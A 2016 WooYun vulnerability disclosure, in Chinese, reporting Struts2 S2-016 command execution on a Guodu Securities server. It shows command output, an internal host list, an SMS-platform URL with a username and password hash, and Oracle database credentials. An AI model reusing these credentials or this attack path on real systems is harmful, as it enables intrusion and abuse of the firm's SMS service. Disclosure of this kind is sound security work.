当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204861

漏洞标题:国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

相关厂商:国都证券

漏洞作者: 路人甲

提交时间:2016-05-04 12:13

修复时间:2016-05-10 13:24

公开时间:2016-05-10 13:24

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-10: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

http://wx.guodu.com/ tomcat
拿出神器扫到了mic目录
一顿 admin XXXXX 各种尝试没成功,抓了包看到了下面验证连接
http://211.144.149.2/mic/admin/check.action 嗯继续神器 S2-016
webpath:C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\mic\
whoami:2003server\administrator
shell

1.PNG


Windows IP Configuration
Host Name . . . . . . . . . . . . : 2003server
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter
Physical Address. . . . . . . . . : 00-19-BB-2D-5C-34
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.7.94
Subnet Mask . . . . . . . . . . . : 255.255.255.192
Default Gateway . . . . . . . . . : 192.168.7.126
DNS Servers . . . . . . . . . . . : 202.106.0.20
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter #2
Physical Address. . . . . . . . . : 00-19-BB-2D-BB-6A
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.7.24
Subnet Mask . . . . . . . . . . . : 255.255.255.224
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 8.8.8.8


\\2003SERVER                                                                   
\\GDZQ-7651EBDFE8
\\GDZQ-795E336EDB
\\HP360G9
\\HPDL360
\\HX-SAMBA Samba Server
\\MESSAGER messager
\\WIN-066GPLR88JU
\\WIN-0A0MPF8TMEU
\\WIN-FSHV3DDVUO6
\\WIN-IN628LJA7CS
\\WIN-J37A7RH28GL
\\WIN-MFSE1E83RLD
\\WIN-ODNVU8TOBF0
\\WIN-P18OAFJNR2I
\\WINDOWS-H3D8UMJ
\\WINDOWS-J8IU964
\\WINDOWS-M6JG4FA
\\WINDOWS-NVUC7Q8
\\WSJYZX


短信平台

mask 区域
1.://**.**.**//211.144.149.1/smsSendServlet.htmcommand=sendSMSMD5&incode=UTF-8&rstype=text&username=wskh&pwd=7D99874519704FB23F227EC8F5D616AD_
**********
***** ws*****

登陆后可随意发送短信

0504_1.jpg


<T>XDB</T> 
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:@192.168.7.130:1521
weixin
weixin
gdappdb
</X>


数据库就不看了

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-05-04 13:00

厂商回复:

确认漏洞,正组织修复

最新状态:

2016-05-10:漏洞已修复


漏洞评价:

评价